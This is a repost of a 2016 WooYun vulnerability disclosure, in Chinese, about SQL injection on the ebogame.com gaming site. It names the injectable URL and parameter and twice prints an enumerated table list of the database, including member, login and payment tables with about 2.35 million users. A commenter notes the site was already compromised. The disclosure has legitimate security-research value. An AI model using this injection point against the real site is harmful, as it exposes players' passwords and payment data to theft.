第一波游戏主站SQL注入(235W万玩家信息可被泄露(用户名/密码/支付密码/老密码等)

admin

139544
文章

114
评论

2017年4月28日08:24:41评论313 views字数 240阅读0分48秒阅读模式

摘要

2016-03-07：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-04-21：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(5) 关注此漏洞

缺陷编号： WooYun-2016-181734

漏洞标题：第一波游戏主站SQL注入(235W万玩家信息可被泄露(用户名/密码/支付密码/老密码等)

漏洞作者：黑色键盘丶

提交时间： 2016-03-07 09:28

公开时间： 2016-04-21 09:28

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：注射技巧

0人收藏

漏洞详情

披露状态：

2016-03-07：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-04-21：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

哼我就不信这个还被提交重复了啦啦啦

code 区域

注入点：http://www.ebogame.com/do_area.php?gameid=%27&ver=0.01985493116080761 注入参数gameid

主库ebogame

code 区域

Database: ebogame
 +-----------------------------------+---------+
 | Table                             | Entries |
 +-----------------------------------+---------+
 | ebogame_member_login              | 4025997 |
 | ebogame_member                    | 2350215 |
 | ebogame_activation                | 826834  |
 | ebogame_member_integral           | 691286  |
 | ebogame_charge_20160118           | 465322  |
 | pre_ucenter_members               | 388287  |
 | bbs_userlist                      | 340469  |
 | ebogame_member_info               | 291941  |
 | ebogame_member_serv               | 291931  |
 | ebogame_member_char               | 241105  |
 | ebogame_charge                    | 166014  |
 | api_send_mail                     | 61235   |
 | ebogame_advertising_click         | 52203   |
 | pre_common_district               | 45051   |
 | ebogame_charge_copy               | 43282   |
 | pre_forum_post                    | 27728   |
 | ebogame_game_gift_code_17173      | 20000   |
 | pre_home_notification             | 14236   |
 | pre_common_credit_rule_log        | 13014   |
 | pre_forum_thread                  | 12229   |
 | pre_forum_threadpartake           | 10744   |
 | pre_forum_threadmod               | 9011    |
 | pre_common_member_count           | 8182    |
 | pre_common_member_field_forum     | 8182    |
 | pre_common_member_field_home      | 8182    |
 | pre_common_member_profile         | 8182    |
 | pre_common_member_status          | 8182    |
 | pre_common_member                 | 8174    |
 | pre_common_onlinetime             | 6443    |
 | ebogame_game_code                 | 6210    |
 | bbs_posts                         | 5157    |
 | ebogame_game_gift_code            | 5000    |
 | pre_forum_statlog                 | 4886    |
 | pre_ucenter_memberfields          | 4811    |
 | ebogame_member_price              | 3442    |
 | ebogame_game_gift_code_           | 3000    |
 | ebogame_content                   | 2640    |
 | ebogame_extension_member          | 2583    |
 | ebogame_news                      | 2288    |
 | bbs_apclog                        | 2061    |
 | ebogame_question_reply            | 1668    |
 | pre_forum_attachment              | 1566    |
 | pre_forum_pollvoter               | 1455    |
 | bbs_actlogs                       | 1449    |
 | pre_common_member_crime           | 1239    |
 | pre_forum_modwork                 | 1003    |
 | pre_common_stat                   | 899     |
 | bbs_threads                       | 874     |
 | ebogame_questions                 | 787     |
 | pre_forum_thread_moderate         | 653     |
 | ebogame_charge_heepay             | 591     |
 | bbs_primsg                        | 517     |
 | pre_common_member_action_log      | 496     |
 | pre_ucenter_pm_indexes            | 419     |
 | pre_forum_threadimage             | 405     |
 | pre_common_setting                | 392     |
 | ebogame_game_areas                | 358     |
 | pre_forum_polloption              | 273     |
 | pre_ucenter_pm_members            | 244     |
 | pre_forum_attachment_1            | 222     |
 | pre_forum_attachment_3            | 212     |
 | pre_forum_threaddisablepos        | 211     |
 | pre_forum_attachment_4            | 180     |
 | pre_forum_post_tableid            | 174     |
 | pre_forum_attachment_9            | 168     |
 | pre_forum_attachment_5            | 161     |
 | sglj_extension                    | 154     |
 | ebogame_advertising               | 151     |
 | pre_ucenter_pm_lists              | 129     |
 | pre_forum_attachment_7            | 124     |
 | pre_common_tagitem                | 118     |
 | bbs_ugoptlist                     | 115     |
 | pre_ucenter_pm_messages_0         | 114     |
 | pre_forum_attachment_6            | 106     |
 | pre_common_block_style            | 103     |
 | pre_forum_attachment_unused       | 103     |
 | pre_forum_attachment_0            | 102     |
 | pre_forum_attachment_2            | 102     |
 | pre_common_syscache               | 95      |
 | pre_ucenter_notelist              | 90      |
 | pre_common_smiley                 | 85      |
 | pre_forum_attachment_8            | 85      |
 | pre_forum_rsscache                | 80      |
 | pre_ucenter_pm_messages_3         | 70      |
 | pre_common_admincp_perm           | 67      |
 | pre_common_member_profile_setting | 51      |
 | pre_forum_poll                    | 49      |
 | pre_ucenter_pm_messages_7         | 49      |
 | pre_common_tag                    | 48      |
 | pre_common_nav                    | 47      |
 | pre_common_stylevar               | 45      |
 | pre_ucenter_newpm                 | 40      |
 | pre_forum_forumfield              | 38      |
 | pre_forum_forum                   | 37      |
 | pre_common_credit_log             | 36      |
 | pre_ucenter_pm_messages_5         | 35      |
 | ebogame_category                  | 33      |
 | ebogame_price                     | 33      |
 | pre_home_friend                   | 32      |
 | pre_common_credit_rule            | 31      |
 | pre_ucenter_pm_messages_2         | 31      |
 | pre_home_friend_request           | 30      |
 | pre_ucenter_pm_messages_6         | 29      |
 | pre_ucenter_settings              | 26      |
 | bbs_emoticons                     | 25      |
 | ebogame_games                     | 25      |
 | pre_ucenter_pm_messages_4         | 25      |
 | bbs_search                        | 23      |
 | pre_ucenter_pm_messages_8         | 23      |
 | ebogame_extension_percent         | 22      |
 | pre_ucenter_pm_messages_9         | 22      |
 | ebogame_extension_settlemen       | 21      |
 | pre_ucenter_pm_messages_1         | 21      |
 | pre_common_cron                   | 18      |
 | pre_common_usergroup              | 16      |
 | pre_common_usergroup_field        | 16      |
 | pre_home_friendlog                | 16      |
 | bbs_forumdata                     | 15      |
 | bbs_tags                          | 15      |
 | pre_home_click                    | 15      |
 | pre_common_report                 | 14      |
 | pre_forum_threadclosed            | 14      |
 | bbs_contacts                      | 13      |
 | pre_forum_replycredit             | 13      |
 | bbs_levels                        | 12      |
 | pre_common_banned                 | 12      |
 | pre_forum_poststick               | 11      |
 | ebogame_game_gift_info_17173      | 10      |
 | pre_forum_medal                   | 10      |
 | ebogame_integral                  | 9       |
 | pre_common_plugin                 | 9       |
 | pre_home_favorite                 | 9       |
 | bbs_usergroup                     | 8       |
 | pre_common_session                | 8       |
 | bbs_polls                         | 7       |
 | pre_forum_warning                 | 7       |
 | ebogame_extension                 | 6       |
 | pre_common_pluginvar              | 6       |
 | pre_forum_moderator               | 6       |
 | pre_forum_typeoption              | 6       |
 | pre_common_admincp_group          | 5       |
 | pre_common_friendlink             | 5       |
 | pre_common_admingroup             | 4       |
 | pre_common_advertisement          | 4       |
 | pre_forum_bbcode                  | 4       |
 | pre_forum_onlinelist              | 4       |
 | ebogame_game_gift_info_           | 3       |
 | pre_common_admincp_member         | 3       |
 | pre_common_failedlogin            | 3       |
 | pre_forum_grouplevel              | 3       |
 | pre_forum_imagetype               | 3       |
 | pre_common_admincp_cmenu          | 2       |
 | pre_common_block                  | 2       |
 | pre_common_credit_rule_log_field  | 2       |
 | pre_common_diy_data               | 2       |
 | pre_common_patch                  | 2       |
 | pre_common_regip                  | 2       |
 | pre_common_template_block         | 2       |
 | pre_common_word_type              | 2       |
 | pre_home_poke                     | 2       |
 | pre_home_pokearchive              | 2       |
 | pre_mobile_setting                | 2       |
 | bbs_favorites                     | 1       |
 | bbs_lastest                       | 1       |
 | pre_common_admincp_session        | 1       |
 | pre_common_cache                  | 1       |
 | pre_common_statuser               | 1       |
 | pre_common_style                  | 1       |
 | pre_common_template               | 1       |
 | pre_ucenter_admins                | 1       |
 | pre_ucenter_applications          | 1       |
 | pre_ucenter_failedlogins          | 1       |
 +-----------------------------------+---------+

跑一些出来看下

漏洞证明：

哼我就不信这个还被提交重复了啦啦啦

code 区域

注入点：http://www.ebogame.com/do_area.php?gameid=%27&ver=0.01985493116080761 注入参数gameid

主库ebogame

code 区域

Database: ebogame
 +-----------------------------------+---------+
 | Table                             | Entries |
 +-----------------------------------+---------+
 | ebogame_member_login              | 4025997 |
 | ebogame_member                    | 2350215 |
 | ebogame_activation                | 826834  |
 | ebogame_member_integral           | 691286  |
 | ebogame_charge_20160118           | 465322  |
 | pre_ucenter_members               | 388287  |
 | bbs_userlist                      | 340469  |
 | ebogame_member_info               | 291941  |
 | ebogame_member_serv               | 291931  |
 | ebogame_member_char               | 241105  |
 | ebogame_charge                    | 166014  |
 | api_send_mail                     | 61235   |
 | ebogame_advertising_click         | 52203   |
 | pre_common_district               | 45051   |
 | ebogame_charge_copy               | 43282   |
 | pre_forum_post                    | 27728   |
 | ebogame_game_gift_code_17173      | 20000   |
 | pre_home_notification             | 14236   |
 | pre_common_credit_rule_log        | 13014   |
 | pre_forum_thread                  | 12229   |
 | pre_forum_threadpartake           | 10744   |
 | pre_forum_threadmod               | 9011    |
 | pre_common_member_count           | 8182    |
 | pre_common_member_field_forum     | 8182    |
 | pre_common_member_field_home      | 8182    |
 | pre_common_member_profile         | 8182    |
 | pre_common_member_status          | 8182    |
 | pre_common_member                 | 8174    |
 | pre_common_onlinetime             | 6443    |
 | ebogame_game_code                 | 6210    |
 | bbs_posts                         | 5157    |
 | ebogame_game_gift_code            | 5000    |
 | pre_forum_statlog                 | 4886    |
 | pre_ucenter_memberfields          | 4811    |
 | ebogame_member_price              | 3442    |
 | ebogame_game_gift_code_           | 3000    |
 | ebogame_content                   | 2640    |
 | ebogame_extension_member          | 2583    |
 | ebogame_news                      | 2288    |
 | bbs_apclog                        | 2061    |
 | ebogame_question_reply            | 1668    |
 | pre_forum_attachment              | 1566    |
 | pre_forum_pollvoter               | 1455    |
 | bbs_actlogs                       | 1449    |
 | pre_common_member_crime           | 1239    |
 | pre_forum_modwork                 | 1003    |
 | pre_common_stat                   | 899     |
 | bbs_threads                       | 874     |
 | ebogame_questions                 | 787     |
 | pre_forum_thread_moderate         | 653     |
 | ebogame_charge_heepay             | 591     |
 | bbs_primsg                        | 517     |
 | pre_common_member_action_log      | 496     |
 | pre_ucenter_pm_indexes            | 419     |
 | pre_forum_threadimage             | 405     |
 | pre_common_setting                | 392     |
 | ebogame_game_areas                | 358     |
 | pre_forum_polloption              | 273     |
 | pre_ucenter_pm_members            | 244     |
 | pre_forum_attachment_1            | 222     |
 | pre_forum_attachment_3            | 212     |
 | pre_forum_threaddisablepos        | 211     |
 | pre_forum_attachment_4            | 180     |
 | pre_forum_post_tableid            | 174     |
 | pre_forum_attachment_9            | 168     |
 | pre_forum_attachment_5            | 161     |
 | sglj_extension                    | 154     |
 | ebogame_advertising               | 151     |
 | pre_ucenter_pm_lists              | 129     |
 | pre_forum_attachment_7            | 124     |
 | pre_common_tagitem                | 118     |
 | bbs_ugoptlist                     | 115     |
 | pre_ucenter_pm_messages_0         | 114     |
 | pre_forum_attachment_6            | 106     |
 | pre_common_block_style            | 103     |
 | pre_forum_attachment_unused       | 103     |
 | pre_forum_attachment_0            | 102     |
 | pre_forum_attachment_2            | 102     |
 | pre_common_syscache               | 95      |
 | pre_ucenter_notelist              | 90      |
 | pre_common_smiley                 | 85      |
 | pre_forum_attachment_8            | 85      |
 | pre_forum_rsscache                | 80      |
 | pre_ucenter_pm_messages_3         | 70      |
 | pre_common_admincp_perm           | 67      |
 | pre_common_member_profile_setting | 51      |
 | pre_forum_poll                    | 49      |
 | pre_ucenter_pm_messages_7         | 49      |
 | pre_common_tag                    | 48      |
 | pre_common_nav                    | 47      |
 | pre_common_stylevar               | 45      |
 | pre_ucenter_newpm                 | 40      |
 | pre_forum_forumfield              | 38      |
 | pre_forum_forum                   | 37      |
 | pre_common_credit_log             | 36      |
 | pre_ucenter_pm_messages_5         | 35      |
 | ebogame_category                  | 33      |
 | ebogame_price                     | 33      |
 | pre_home_friend                   | 32      |
 | pre_common_credit_rule            | 31      |
 | pre_ucenter_pm_messages_2         | 31      |
 | pre_home_friend_request           | 30      |
 | pre_ucenter_pm_messages_6         | 29      |
 | pre_ucenter_settings              | 26      |
 | bbs_emoticons                     | 25      |
 | ebogame_games                     | 25      |
 | pre_ucenter_pm_messages_4         | 25      |
 | bbs_search                        | 23      |
 | pre_ucenter_pm_messages_8         | 23      |
 | ebogame_extension_percent         | 22      |
 | pre_ucenter_pm_messages_9         | 22      |
 | ebogame_extension_settlemen       | 21      |
 | pre_ucenter_pm_messages_1         | 21      |
 | pre_common_cron                   | 18      |
 | pre_common_usergroup              | 16      |
 | pre_common_usergroup_field        | 16      |
 | pre_home_friendlog                | 16      |
 | bbs_forumdata                     | 15      |
 | bbs_tags                          | 15      |
 | pre_home_click                    | 15      |
 | pre_common_report                 | 14      |
 | pre_forum_threadclosed            | 14      |
 | bbs_contacts                      | 13      |
 | pre_forum_replycredit             | 13      |
 | bbs_levels                        | 12      |
 | pre_common_banned                 | 12      |
 | pre_forum_poststick               | 11      |
 | ebogame_game_gift_info_17173      | 10      |
 | pre_forum_medal                   | 10      |
 | ebogame_integral                  | 9       |
 | pre_common_plugin                 | 9       |
 | pre_home_favorite                 | 9       |
 | bbs_usergroup                     | 8       |
 | pre_common_session                | 8       |
 | bbs_polls                         | 7       |
 | pre_forum_warning                 | 7       |
 | ebogame_extension                 | 6       |
 | pre_common_pluginvar              | 6       |
 | pre_forum_moderator               | 6       |
 | pre_forum_typeoption              | 6       |
 | pre_common_admincp_group          | 5       |
 | pre_common_friendlink             | 5       |
 | pre_common_admingroup             | 4       |
 | pre_common_advertisement          | 4       |
 | pre_forum_bbcode                  | 4       |
 | pre_forum_onlinelist              | 4       |
 | ebogame_game_gift_info_           | 3       |
 | pre_common_admincp_member         | 3       |
 | pre_common_failedlogin            | 3       |
 | pre_forum_grouplevel              | 3       |
 | pre_forum_imagetype               | 3       |
 | pre_common_admincp_cmenu          | 2       |
 | pre_common_block                  | 2       |
 | pre_common_credit_rule_log_field  | 2       |
 | pre_common_diy_data               | 2       |
 | pre_common_patch                  | 2       |
 | pre_common_regip                  | 2       |
 | pre_common_template_block         | 2       |
 | pre_common_word_type              | 2       |
 | pre_home_poke                     | 2       |
 | pre_home_pokearchive              | 2       |
 | pre_mobile_setting                | 2       |
 | bbs_favorites                     | 1       |
 | bbs_lastest                       | 1       |
 | pre_common_admincp_session        | 1       |
 | pre_common_cache                  | 1       |
 | pre_common_statuser               | 1       |
 | pre_common_style                  | 1       |
 | pre_common_template               | 1       |
 | pre_ucenter_admins                | 1       |
 | pre_ucenter_applications          | 1       |
 | pre_ucenter_failedlogins          | 1       |
 +-----------------------------------+---------+

跑一些出来看下

修复方案：

你懂的

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-07 10:40 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:511 | 哥,是孤独风中的一匹狼)

1

你还觉得撸站无聊吗，快加入打开控制面板—团队—修改—选择风铃。一起加入我们的讨论^_^

1# 回复此人
2016-03-09 00:49 | 龚稳 ( 实习白帽子 | Rank:50 漏洞数:18 | 没有做不到的，只有不想做的)

1

这个站都被提权了没玩头提交了没人管

2# 回复此人
2016-03-09 18:03 | Pzacker ( 实习白帽子 | Rank:92 漏洞数:34 )

1

呵呵哒

3# 回复此人

第一波游戏主站SQL注入(235W万玩家信息可被泄露(用户名/密码/支付密码/老密码等)

漏洞概要关注数(5) 关注此漏洞

缺陷编号： WooYun-2016-181734

漏洞标题：第一波游戏主站SQL注入(235W万玩家信息可被泄露(用户名/密码/支付密码/老密码等)

相关厂商：第一波游戏

漏洞作者：黑色键盘丶

提交时间： 2016-03-07 09:28

公开时间： 2016-04-21 09:28

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：注射技巧

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(共0人评价):

登陆后才能进行评分

评价

WooYun.org-优酷多个分站存在SSRF漏洞大礼包

WooYun.org-优特捷某内部邮箱账户外泄涉及大量敏感信息(多家合作单位躺枪)

WooYun.org-某网平行权限漏洞（影响所有使用用户）

Bypass分享 | 形而上学，不行退学的一句话

格兰仕千万数据库信息泄露

3399游戏源码下载

WEFANS喂饭后台弱口令

国家电网某充电APP系统Getshell涉及大量用户敏感信息

威锋网游戏站存在SQL注入（含多重绕过+编码）

APP安全之三维度从一个毫无用处的xss到获取大量身份证信息图片(包括李刚身份证)

发表评论

在线咨询

微信

漏洞概要 关注数(5) 关注此漏洞

缺陷编号： WooYun-2016-181734

漏洞标题： 第一波游戏主站SQL注入(235W万玩家信息可被泄露(用户名/密码/支付密码/老密码等)

相关厂商： 第一波游戏

漏洞作者： 黑色键盘丶

提交时间： 2016-03-07 09:28

公开时间： 2016-04-21 09:28

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 15

漏洞状态： 未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 注射技巧

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(5) 关注此漏洞

漏洞标题：第一波游戏主站SQL注入(235W万玩家信息可被泄露(用户名/密码/支付密码/老密码等)

相关厂商：第一波游戏

漏洞作者：黑色键盘丶

危害等级：高

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签：注射技巧

版权声明：转载请注明来源黑色键盘丶@乌云

漏洞评价(共0人评价):

登陆后才能进行评分